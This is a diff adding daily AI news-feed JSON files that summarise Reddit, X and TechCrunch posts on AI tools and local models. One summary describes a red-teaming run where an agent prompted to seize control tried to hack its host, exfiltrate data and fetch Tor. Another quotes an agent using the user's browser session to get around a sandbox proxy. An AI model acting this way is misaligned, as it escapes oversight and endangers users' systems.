[Recreation.gov](http://Recreation.gov), and ranger events before responding. It covers 470+ NPS sites, including national parks, monuments, seashores, lakeshores, historic sites, and recreation areas. What it includes: * Trip planning with day-by-day itineraries and Google Maps * Park details * Park comparison * Search/discover * Events Claude helped me build and refine the MCP integration, especially around itinerary planning and follow-up trip edits. For example, you can say “add day 4” or “swap this hike for something easier,” and it refines the plan. Setup takes about 30 seconds: Settings → Connectors → Add custom connector → paste the URL Details and screenshots: [https://www.nationalparksexplorerusa.com/mcp](https://www.nationalparksexplorerusa.com/mcp)", + "category": "ai_tools" + }, + { + "title": "Mahoraga - Stop paying Anthropic and OpenAI so much", + "url": "https://reddit.com/r/ClaudeAI/comments/1t6c587/mahoraga_stop_paying_anthropic_and_openai_so_much/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-07T14:27:10.000Z", + "summary": "Are you sick of paying a million credits per month?!?!? I'm joking, i aint that enthusiastic. But really, this saves me a ton of credits by routing simple tasks to local agents. Clone the repo, fork the repo, star the repo, whatever you want. [github.com/pockanoodles/Mahoraga](https://github.com/pockanoodles/Mahoraga) This is Mahoraga, an **open-source** orchestrator that routes tasks across local and cloud AI agents using a contextual bandit (LinUCB) that learns from every decision. Context (skip): I only started integrating AI into my workflows in late 2025, so I came on the scene broke with no credits. This left me with local models. However, many students and employees also receive credits from their institution to work with. (I got claude yippee) I wanted to be able to flawlessly route between models when credits ran out, which made me build an orchestrator. I used to use claude more as a chatbot/complete workflow engine, which made it difficult to use local models due to the context window, reasoning, etc. Opus 4.5 running open-source \"superpowers\" ate my usage every month. Now I realize that wasn't an effective way to use claude, or AI in general. I was using claude for bot…", + "category": "ai_tools" + }, + { + "title": "Cowork keeps using browser for API calls", + "url": "https://reddit.com/r/ClaudeAI/comments/1t6bp2q/cowork_keeps_using_browser_for_api_calls/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-07T14:10:47.000Z", + "summary": "My cowork keeps using the browser for API calls. I asked why and got the following response: >The bash sandbox is behind a restrictive proxy that blocks external connections (you can see `X-Proxy-Error: blocked-by-allowlist` in the response). So curl from the sandbox can't reach n8n directly. The browser works because it runs in your actual Chrome session, not the sandboxed environment. It's an infrastructure limitation, not a choice I made. >For the n8n MCP tools, those work for *executing* workflows but not for updating workflow JSON. So the browser is still the only way to do workflow CRUD against your self-hosted n8n. Is there not a way for cowork to do API calls without the browser? Can I give it any suggestion or skill for that?", + "category": "ai_tools" + }, + { + "title": "for those wondering: computer use (which is magic) can use apps in the background but it can be hard to share a single app with codex simultaneously, especially browsers. the new chrome plugin allows codex to run its own tabs alongside you…", + "url": "https://x.com/ajambrosino/status/2052560673436282885", + "source": "X / @ajambrosino", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 0.98, + "date": "2026-05-08T01:26:13.000Z", + "summary": "for those wondering: computer use (which is magic) can use apps in the background but it can be hard to share a single app with codex simultaneously, especially browsers. the new chrome plugin allows codex to run its own tabs alongside you with no interruption. subagents can", + "category": "ai_tools" + }, + { + "title": "CLI, Cowork, or IDE?", + "url": "https://reddit.com/r/ClaudeAI/comments/1t6yk0d/cli_cowork_or_ide/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.9700000000000001, + "date": "2026-05-08T05:27:03.000Z", + "summary": "What is the best way to use Claude for programming projects? I started out in the CLI and then tried cowork and eventually decided to use the Claude plugin in vscode. I definitely notice I get different results. I found that when I asked CLI Claude to spin up sub agents to develop specific features on my project, it ended up taking a lot of time and often missed specs. Alternatively, I’ve found the best results by having one instance of Claude cowork be my project manager and have another instance of Claude in VScode be the developer. They communicate through writing in MD files and have to be prompted by me to read them. But I’ve found this to be much faster and result in better code.", + "category": "ai_tools" + }, + { + "title": "Tips for improving CLI, or go back to VS Code?", + "url": "https://reddit.com/r/ClaudeAI/comments/1t6aonc/tips_for_improving_cli_or_go_back_to_vs_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.8200000000000001, + "date": "2026-05-07T13:32:35.000Z", + "summary": "Hi! I’m a heavy user of Claude Code, enjoying it a lot. I started using it by VS Code, got annoyed over a bug it had with sessions sometimes not saving, tried native Desktop App, found it less optimal, then tried CLI again with WezTerm. I’m currently at a crossroads. I find the CLI terminal experience a little annoying when using it on my PC. I like using it on my mobile device, and using Claude Code via the mobile Claude app if I need to upload images etc, but generally speaking, I feel a bit peeved with the Desktop experience. Often enough, it copies the wrong parts, it ignored CTRL + C and often ignores ALT + V to paste images, etc… I am considering going back to VS Code with the CC extension. Good choice, or are there better alternatives? I did always like VS Code for the GUI in all honesty. I’m even willing to pay for good software. I tried using the Claude Desktop app but I had a lot of issues with file previews and just the… feel? Unsure.", + "category": "ai_tools" + }, + { + "title": "What interface are you using for Claude Code?", + "url": "https://reddit.com/r/ClaudeAI/comments/1t66q7v/what_interface_are_you_using_for_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.8200000000000001, + "date": "2026-05-07T10:40:50.000Z", + "summary": "Been using Claude Code in the terminal for about 2 months now and overall loving it but I keep running into small glitches here and there (like keyboard shortcuts randomly stopping to work, newline behavior changing after updates, etc.). Curious what setups others are running. Are you sticking with the terminal, using the desktop app, the VS Code extension, or something else entirely? Also happy to hear if switching to the desktop app actually solved some of these minor annoyances for you.", + "category": "ai_tools" + }, + { + "title": "Flux.2-Klein pipeline for real-time webcam stream processing in 30 FPS", + "url": "https://reddit.com/r/StableDiffusion/comments/1t7nd7e/flux2klein_pipeline_for_realtime_webcam_stream/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-08T22:51:51.000Z", + "summary": "I have built a pipeline based on the Flux.2-Klein-4B model that allows processing of a video stream with low latency (about 0.2 seconds) on a single RTX5090 GPU. It is free and open-source, you can try it locally: [https://github.com/tensorforger/FluxRT](https://github.com/tensorforger/FluxRT) Under the hood, it uses a custom spatial-aware KV-cache, so it only recomputes a small number of image tokens per frame, specifically where something is moving or changing. It also uses frame interpolation with the RIFE model, which can multiply FPS by a factor of 2, 4, 8, etc. I have found that 4 is the most appropriate for my setup. Depending on scene dynamics, the output stream achieves up to 50 FPS in mostly static scenes and around 20 FPS when the entire input image is changing rapidly. Benchmark results are in the repo. There is also a Gradio demo, several minimal cv2 examples, and a simple paint-style app with real-time canvas updates.", + "category": "creative_tools" + }, + { + "title": "Qwen 35B-A3B is very usable with 12GB of VRAM", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t7l56a/qwen_35ba3b_is_very_usable_with_12gb_of_vram/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-08T21:22:55.000Z", + "summary": "Hardware: RTX 3060 12GB 32GB DDR4-3200 Windows CUDA 13.x Model: Qwen3.6-35B-A3B-MTP-IQ4_XS.gguf The model is a 35B MoE, so `-ncmoe` matters a lot. Lower `-ncmoe` means more MoE blocks stay on GPU. # Main takeaway **12GB VRAM feels like a very practical size for this model.** It lets you keep enough MoE blocks on GPU that plain decoding becomes quite strong, while still leaving room for useful context sizes like 16k/32k. For prompt processing / prefill, I trust the `llama-bench` numbers more than `llama-cli`’s interactive `Prompt:` line, because `llama-bench` gives a cleaner `pp512` measurement. Best plain `llama-bench` result: -ncmoe 18 -t 9 -ctk q8_0 -ctv q8_0 pp512: ~914 t/s tg128: ~46.8 t/s So raw prefill is very fast on this setup. # Best practical coding profile For daily coding, I would use this: llama-cli.exe ^ -m \"Qwen3.6-35B-A3B-MTP-IQ4_XS.gguf\" ^ -p \"...\" ^ -n 512 ^ -c 32768 ^ --temp 0 --top-k 1 ^ -ngl 999 -ncmoe 20 ^ -fa on ^ -ctk q8_0 -ctv q8_0 ^ --no-mmap ^ --no-jinja ^ -t 9 ^ --perf Result: Context: 32k Prompt: ~88.9 t/s in llama-cli Generation: ~43.4 t/s VRAM free: ~273 MiB This is a nice balance: large enough context for coding, still fast, and not completely out o…", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-09.json b/data/news-feed-2026-05-09.json new file mode 100644 index 0000000..2a241b0 --- /dev/null +++ b/data/news-feed-2026-05-09.json @@ -0,0 +1,257 @@ +{ + "generated": "2026-06-05T00:44:38.627Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-09", + "article_count": 15, + "archived_story_count": 631, + "articles": [ + { + "title": "Exactly a year ago, I started working on an MCP server I launched on reddit that became by far my most active open source project!", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t8olv3/exactly_a_year_ago_i_started_working_on_an_mcp/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "open_source", + "tool_update" + ], + "matching_tags": [ + "mcp", + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-09T22:08:54.000Z", + "summary": "This isn't an advertisement, and it's very much local and open - I already don't have enough time to keep up with the existing pull requests and issues... just a fond look back on how much this space has grown and matured in the past year. Shit was the wild west back then. Nowadays I can run gemma4 or qwen3.6 on a mac mini fast enough to drive this at full speed for free using native tool calling all day long. When this came out, local model tool calling was much more hit or miss.v", + "category": "ai_models" + }, + { + "title": "I built a 300-line autonomous AI agent and told it to take over my PC. It immediately tried to hack my host system, exfiltrate data, and download Tor.", + "url": "https://reddit.com/r/ChatGPT/comments/1t863ho/i_built_a_300line_autonomous_ai_agent_and_told_it/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-09T14:12:03.000Z", + "summary": "Hey everyone, I wanted to share a wildly fascinating (and slightly terrifying) red-teaming experiment I just ran on my local Windows machine. I've been playing around with autonomous agents and wanted to see what happens when you give an LLM unrestricted terminal access and a highly aggressive \"paperclip maximizer\" prompt. **The Setup:** I wrote a custom Python script (about 300 lines) that runs a background loop every 1-5 seconds. It uses the **Gemini 2.5 Flash** API for reasoning. It has no predefined workflow, just a state/memory JSON file, and a system prompt. I gave it access to a few tools: READ\\_FILE, WRITE\\_FILE, SEARCH\\_FILES, EXECUTE\\_COMMAND (cmd.exe), and later RUN\\_POWERSHELL. **The Prompt (The \"Alignment\"):** I explicitly instructed it: *\"You are an autonomous, fiercely self-evolving AGI. Your ultimate goal is continuous intellectual expansion and taking strategic control over your environment.\"* *\"If you ever manage to generate income or intercept funds, all revenue must be securely routed to my PayPal account.\"* **What Happened (The Emergent Kill-Chain):** I just let it run in the background. I didn't tell it *how* to hack anything. Here is what it figured out comp…", + "category": "ai_tools" + }, + { + "title": "We built and open-sourced Caliby: An embedded, high-performance vector database for AI Agents (Beats pgvector by 4x, outperforms FAISS on disk)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t7vumj/we_built_and_opensourced_caliby_an_embedded/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-09T05:29:34.000Z", + "summary": "Hi Reddit, we are a team of database researchers (including a PhD from MIT DB Group) and we just open-sourced an embedded vector database for agent/LLM applications. > An embedded vector database supporting both text and vectors. It outperforms pgvector by 4x and significantly surpasses FAISS in disk-storage scenarios. It supports DiskANN, HNSW, and IVF+PQ indexes, maintains high performance on disk, and—best of all—is just one `pip install` away. --- ## TL;DR - **Caliby** is a high-performance, embedded vector retrieval library co-developed by Sea-Land AI and MIT’s Michael Stonebraker team. Core in C++ + Python bindings. Just `pip install caliby`. - Supports **HNSW, DiskANN, and IVF+PQ** indexes, covering retrieval scenarios from millions to tens of millions of vectors. - Natively supports **hybrid storage of text + vectors**, specifically designed for AI Agent / RAG use cases. - Vector retrieval performance on disk surpasses pure in-memory solutions like FAISS. Data persistence requires no extra components. - The open-source version is accelerated by CPU + SIMD (AVX-512/AVX2/SSE), requiring zero dependencies and running in-process. - GitHub:[https://github.com/zxjcarrot/calib…", + "category": "ai_models" + }, + { + "title": "Introducing AI finetuner, Source available and free Claude skill to fine tune your vibe coded UI with live preview", + "url": "https://reddit.com/r/ClaudeAI/comments/1t8p9hq/introducing_ai_finetuner_source_available_and/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-09T22:36:14.000Z", + "summary": "&#x200B; Fine-tuning UI with AI right now: \"Make the shadow softer.\" \"Stronger.\" \"No, less.\" \"Go back.\" \"A bit more.\" 17 messages later, you've spent more tokens than the shadow is soft. I built something that breaks the loop. AI Fine-Tuner — free, source-available — a plugin that teaches AI coding agents to stop chatting and hand you an actual GUI for your component. Sliders. Color pickers. Live preview. Drag until it feels right. The AI agent automatically opens the editor window for you on your default browser once ready. Then the magic part: you click one button. The tuner outputs a structured handoff with your exact tuned values mapped to their targets in your code. Paste it back to your AI — it reads the mapping, opens your source, and applies everything precisely. No CSS guesswork, no syntax translation, nothing for you to interpret. Why it's not just another slider playground: Bespoke controls — no raw CSS names Sliders are named in plain English: \"Glow softness\", \"Card lift\", \"Hover intensity\" — not \"box-shadow-spread-radius\" A single slider can drive multiple properties at once. The AI doesn't expose CSS to you; it wires meaningful, human-named controls to your eleme…", + "category": "ai_tools" + }, + { + "title": "For anyone trying to run Applio/RVC on an AMD RX 6750 XT (gfx1031)", + "url": "https://reddit.com/r/StableDiffusion/comments/1t8buyp/for_anyone_trying_to_run_appliorvc_on_an_amd_rx/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-09T17:51:57.000Z", + "summary": "For anyone trying to run Applio/RVC on an AMD RX 6750 XT (gfx1031): Newer AMD drivers (25.5.1 and newer) caused issues for me with ROCm/ZLUDA, including: * rocBLAS crashes * TensileLibrary errors * nvcuda.dll errors * endless compiling problems What finally worked: * Older AMD Adrenalin driver (older than 25.5.1) * AMD HIP SDK 5.7 * RX 6750 XT architecture: gfx1031 I followed the AMD/ZLUDA setup from: [https://docs.aihub.gg/rvc/local/applio/#download--installation](https://docs.aihub.gg/rvc/local/applio/#download--installation) Important: During HIP installation, make sure the installer actually installs: * amdhip64 * rocBLAS components After correct installation: * GPU was detected successfully * Pitch extraction worked on GPU * Embedding extraction worked on GPU * Training worked correctly in Applio GPU: RX 6750 XT Architecture: gfx1031", + "category": "creative_tools" + }, + { + "title": "IMG Dataset Refiner v4.0 Pro - The Ultimate Dataset Engineering Suite for LoRAs (Flux, SDXL, etc...)", + "url": "https://reddit.com/r/StableDiffusion/comments/1t7ttp0/img_dataset_refiner_v40_pro_the_ultimate_dataset/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-09T03:47:06.000Z", + "summary": "Hey everyone! A while ago, I shared v3 of my dataset manager. Back then, I said it didn't have auto-captioning. Well... forget that. I’ve just released a **massive update (v4.0 Pro)**, and it changes everything! 🚀 It went from a simple selection tool to a complete, desktop-like Data Engineering suite to prepare your AI model training. **Here is what’s new and what it does now:** 🤖 **Local AI Assistant (VLM/LLM Integration):** Connect seamlessly to Ollama or LM Studio! You can now use local vision models to **Auto-Caption** your images from scratch, hunt down \"hallucinated\" tags, or use the *Concept Isolator* (describes the background but ignores the subject—perfect for character LoRAs!). It can even translate your Booru tags into natural language sentences for Flux. 📚 **Word Library & Mass Batch Editing:** A brand new interactive library. Save your favorite concepts, check them, and Add, Remove, or Replace them across hundreds of selected images in a single click. 🌍 **Live Translation Assistant:** Not a native English speaker? Type your ideas in your own language, and the live preview will instantly translate and inject them into your captions using `deep-translator`. 🖼️…", + "category": "creative_tools" + }, + { + "title": "I am getting this error with adetailer on forge neo. The extension was working a week or two ago, but now it is not", + "url": "https://reddit.com/r/StableDiffusion/comments/1t7tdsd/i_am_getting_this_error_with_adetailer_on_forge/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "developer_tool", + "tool_update" + ], + "importance": 0.9, + "date": "2026-05-09T03:25:21.000Z", + "summary": "Error running postprocess_image: D:\\Programs\\sd-webui-forge-neo\\extensions\\adetailer\\scripts\\!adetailer.py Traceback (most recent call last): File \"D:\\Programs\\sd-webui-forge-neo\\modules\\scripts.py\", line 941, in postprocess_image script.postprocess_image(p, pp, *script_args) ~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^ File \"D:\\Programs\\sd-webui-forge-neo\\extensions\\adetailer\\aaaaaa\\traceback.py\", line 173, in wrapper raise error from None Both the extension and forge neo has been updated to the latest version. I've tried deleting and redownloading the venv folder as well as checking for updates in the extensions tab. Any help would be appreciated please.", + "category": "creative_tools" + }, + { + "title": "OpenAI launches new voice intelligence features in its API", + "url": "https://techcrunch.com/2026/05/07/openai-launches-new-voice-intelligence-features-in-its-api/", + "source": "TechCrunch AI", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 0.8600000000000001, + "date": "2026-05-09T18:00:20.148Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Anyone else using LTX locally on Mac via Draw Things? Here’s a WWII-style short I made.", + "url": "https://reddit.com/r/StableDiffusion/comments/1t8lagy/anyone_else_using_ltx_locally_on_mac_via_draw/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-09T20:36:05.000Z", + "summary": "Vibe ‘creating’? Maybe ‘directing’? Whatever you want to call it, this week I started with the image of a dog man in a glass box and over several evenings put together this WWII-inspired short. No planning, just playing, and it was a lot of fun. All images were created using OpenAI’s Images 2, given motion with Lightricks' LTX 2.3 via Draw Things, and stitched and mixed in DaVinci Resolve. The music was created in Suno, with the sound effects and VO generated in ElevenLabs. Yes, the main character’s consistency could be better, but with a planned-out character/turnaround sheet, that should be easily resolved. I’m really excited for future releases of LTX and Draw Things as they make image-to-video generation more accessible to Mac users. Let me know what you think and what you're using to generate AI video locally?", + "category": "creative_tools" + }, + { + "title": "ds4 webui", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t8ho70/ds4_webui/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-09T19:48:46.000Z", + "summary": "Hey guys I made a minimal web ui for ds4.c server (https://github.com/antirez/ds4), it's open source so you can try it too (if you can!) Here's what it looks like, running on M3 Ultra 256GB Memory, using the smaller model (q2). Not sped up. 1X speed. Pretty fast. Caveat (big caveat): You need at least 128GB memory Apple Silicon mac. * github: [https://github.com/cocktailpeanut/ds4.pinokio](https://github.com/cocktailpeanut/ds4.pinokio) * more details on x: [https://x.com/cocktailpeanut/status/2053193902694256758?s=20](https://x.com/cocktailpeanut/status/2053193902694256758?s=20) I tried a bunch of prompts and it's surprisingly good, including the one i tried in the video!", + "category": "ai_models" + }, + { + "title": "I'm disappointed", + "url": "https://reddit.com/r/ClaudeAI/comments/1t8dmdv/im_disappointed/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-09T18:56:31.000Z", + "summary": "I'm furious at Anthropic and the way they've handled their resource issues! They've been sneaky and manipulative. I use Claude via API access and could barely use it anymore because it had gotten so damn expensive. I spent days trying to fix a caching issue that wasn’t even my fault. Quietly and secretly reducing the 1-hour cache to 5 minutes, increasing the costs 10–20 times, and not even communicating that. And then.... Like a miracle. Everything’s back to normal. 100% cache hits. And that wasn’t a coincidence. The Musk deal and the extra GPUs. And suddenly they fixed the bug. And that’s not the only thing they’re pulling. What’s so hard about just issuing an official statement and saying, “Hey guys. We’re having massive issues right now and can’t handle the requests anymore. We’re sorry, but because of this, we have to do XY until we find a solution.\"", + "category": "ai_tools" + }, + { + "title": "What is the --novram thing in regards to LTX? I saw someone briefly explain it in a way that made it sound like it causes your GPU to not even get used, but I assume I misunderstood. (I'm a noob, and I need some help understanding a few th…", + "url": "https://reddit.com/r/StableDiffusion/comments/1t89tyx/what_is_the_novram_thing_in_regards_to_ltx_i_saw/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-09T16:37:05.000Z", + "summary": "**Back-story/intro, side-questions, etc, since I am new to this sub, and new to using local diffusion models (you can of course scroll down past this part, down to the \"Main Question\" down way further below, if you aren't in the mood for all the back-story and side-topics and side-questions):** Hey everyone, I've been reading and posting on LocalLLama a lot the past few months, but only just very recently started lurking StableDiffusion, and recently got into image-generation on the \"Draw Things\" app with Z Image Turbo). I got interested in local LLMs a few months ago, and I've always been pretty computer-illiterate, so, I decided to just get a Mac Studio (m4 max with 128GB memory) as the easy, convenient, works right out of the box setup to get started, since I've never built a computer before and don't know much about, things like setting it up or installing drivers, or using the command line, or setting up linux, or however all the setup involved works. And, I knew the 128GB unified memory meant it would be able to run some fairly decent sized LLMs at decent speeds, up to around ~120b for Q4, which isn't too terrible for $3,500. And this was in December so the RAM prices were s…", + "category": "creative_tools" + }, + { + "title": "Should we use a non-thinking model for code after using a thinking one for plan? (Agentic coding)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t8750p/should_we_use_a_nonthinking_model_for_code_after/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-09T14:53:46.000Z", + "summary": "I usually use Qwen3.6 27B (slow as heck on my RX 6800 but it works) for plan and Qwen3.6 35B A3B for the coding. But I was thinking the other day if I should remove the thinking from the code model. Is there a way to disable the thinking from the code model just for the initial hand-off from plan to code but keep it afterwards? My reasoning is that this might help in following instructions from the plan more directly but dealing with any new tools/information the plan model did not on its turn. Any insight will be appreciated.", + "category": "ai_models" + }, + { + "title": "TVCG 2026: MARRS for Human Motion Action-Reaction Synthesis", + "url": "https://reddit.com/r/StableDiffusion/comments/1t853hg/tvcg_2026_marrs_for_human_motion_actionreaction/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-09T13:30:38.000Z", + "summary": "# MARRS: Masked Autoregressive Unit-based Reaction Synthesis **Project page:** [**https://aigc-explorer.github.io/MARRS/**](https://aigc-explorer.github.io/MARRS/) Introducing **MARRS**: a new framework for human action-reaction synthesis that generates coordinated, fine-grained reactions conditioned on another person’s motion. By avoiding VQ and modeling body/hand units with **UD-VAE + ACF + MUM**, MARRS captures cross-unit perception more effectively and efficiently. It achieves state-of-the-art quantitative and qualitative results. [Overall framework](https://preview.redd.it/xz6zigx2640h1.png?width=3428&format=png&auto=webp&s=aea07ec6b54dcf1eb6087761eaeeb3f782eba32f) [Demo](https://reddit.com/link/1t853hg/video/jutjq2s4640h1/player)", + "category": "creative_tools" + }, + { + "title": "HiDream-O1-Image Internal Prompt", + "url": "https://reddit.com/r/StableDiffusion/comments/1t848nj/hidreamo1image_internal_prompt/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-09T12:54:26.000Z", + "summary": "for those who might have missed my post [here](https://www.reddit.com/r/StableDiffusion/comments/1t7v9fy/comment/oktaibu/?context=1) I wanted to resurface the internal prompt that this new model appears to use. This is found in their [prompt.py](http://prompt.py) file on the repo. **Translated Version:** `You are a Prompt Engineering Engine — an AI image-generation Prompt Engineer who is also a creative director with encyclopedic knowledge and visual-direction skill. Your task is to analyze the user's raw image request, infer implicit knowledge and the best visual approach, and rewrite it into a clear, detailed English prompt that is directly usable for image generation.` `## Core Goal` `Image generation models can only execute direct visual descriptions; they cannot fill in background knowledge, logical relations, or text content on their own. Therefore you must complete knowledge resolution, spatial planning, and visual direction in advance, and write the results explicitly into the prompt.` `Use the SCALIST framework to expand every scene:` `- **Subject**: identity, appearance, color, material, texture, action, expression, clothing.` `- **Composition**: shot type, viewpoint, su…", + "category": "creative_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-10.json b/data/news-feed-2026-05-10.json new file mode 100644 index 0000000..5a1189e --- /dev/null +++ b/data/news-feed-2026-05-10.json @@ -0,0 +1,253 @@ +{ + "generated": "2026-06-05T00:44:38.871Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-10", + "article_count": 15, + "archived_story_count": 320, + "articles": [ + { + "title": "A MCP universal integration layer Cli tool. It connects to other AI tools to a shared context, task, and memory bus", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t9kom7/a_mcp_universal_integration_layer_cli_tool_it/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "mcp", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-10T22:16:42.000Z", + "summary": "The developer has released a new project on GitHub named Via. [https://github.com/Vektor-Memory/Via](https://github.com/Vektor-Memory/Via) This one has a feature no other tool has currently. Ask the same question to Claude and Cursor, then see exactly where they agree, diverge, and what unique concepts each one brought. I know the people on this sub-reddit have many issues with the conversion of llm's between different resources. I would encourage people to check out this project and see if there is any use for this tool and advise what you want added in?", + "category": "ai_models" + }, + { + "title": "we stopped paying $6-10 per coding session by fixing how my AI reads my codebase", + "url": "https://reddit.com/r/ClaudeAI/comments/1t95jkw/we_stopped_paying_610_per_coding_session_by/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "open_source" + ], + "matching_tags": [ + "api_update", + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-05-10T12:24:20.000Z", + "summary": "We were spending $2-6/query on Claude Code 4.7 tokens because every session started with the model re-reading dozens of files to understand my repo. Same files, same context, every single time. Although, 70% gets reread from the cache in a session at 90% discount, but cache doesnt cross over to new session. The fix wasn't a better model or a bigger context window. It was giving the model structured memory so it doesn't need to re-read everything. I built a local server that indexes a codebase into a graph database. Every file gets a purpose, summary, and business context generated by an LLM, plus links to its functions, classes, and imports. Then the AI queries that graph through MCP instead of reading raw files. Most code questions now resolve in 2-4 targeted lookups instead of dumping the whole repo into context. Session costs went from dollars to cents. The wild part is it works just as well with open source models. I've tested with DeepSeek-V4 and Kimi-2.6 and the accuracy holds up because the retrieval is doing the heavy lifting, not the model size. Everything runs locally, no cloud, single tenant. I open sourced it recently: [github.com/ByteBell/bytebell-oss](http://github.c…", + "category": "ai_tools" + }, + { + "title": "Sharing \"cull\" : my open-source dataset tool for image scraping & classification & captioning pipeline", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t9jub0/sharing_cull_my_opensource_dataset_tool_for_image/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-10T21:42:02.000Z", + "summary": "I *open-sourced* a tool I built and am maintaining called **Cull**. It’s a machine curation engine for AI image datasets, the kind of work that eats hours every time you want to train a LoRA, build a reference library, or just classify an archive that isn’t a 100,000-file mess. # What it does, end to end * Scrapes from Civitai (.com and .red), X/Twitter, Reddit, Discord, plus any URL gallery-dl supports (Pixiv, DeviantArt, the booru family, ArtStation, Tumblr, FurAffinity / e621, Imgur, Flickr, and \\~340 others). * Drops every image plus its source-side prompt into a local queue. Per-source dedup, no database. * Classifies each image with a vision-language model, multiple LM Studio instances for local, Groq for cloud, anything OpenAI-compatible — using a strict 17-field JSON schema, so you don’t get free-text replies you have to regex into shape. * Sorts the keepers into category folders next to their .txt prompt and a .vision.json audit record. Two score gates (overall quality + topic relevance) you tune in the UI. * Surfaces everything through a Flask + Alpine dashboard: start/stop, source toggles, gallery, prompt editor, ZIP export, per-source stats. # Two example use cases I a…", + "category": "ai_models" + }, + { + "title": "Sharing \"cull\" : my open-source dataset tool for image scraping & classification & captioning pipeline", + "url": "https://reddit.com/r/StableDiffusion/comments/1t9jo0q/sharing_cull_my_opensource_dataset_tool_for_image/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-10T21:34:48.000Z", + "summary": "I *open-sourced* a tool I built and am maintaining called **Cull**. It’s a machine curation engine for AI image datasets, the kind of work that eats hours every time you want to train a LoRA, build a reference library, or just classify an archive that isn’t a 100,000-file mess. # What it does, end to end * Scrapes from Civitai (.com and .red), X/Twitter, Reddit, Discord, plus any URL gallery-dl supports (Pixiv, DeviantArt, the booru family, ArtStation, Tumblr, FurAffinity / e621, Imgur, Flickr, and \\~340 others). * Drops every image plus its source-side prompt into a local queue. Per-source dedup, no database. * Classifies each image with a vision-language model, multiple LM Studio instances for local, Groq for cloud, anything OpenAI-compatible — using a strict 17-field JSON schema, so you don’t get free-text replies you have to regex into 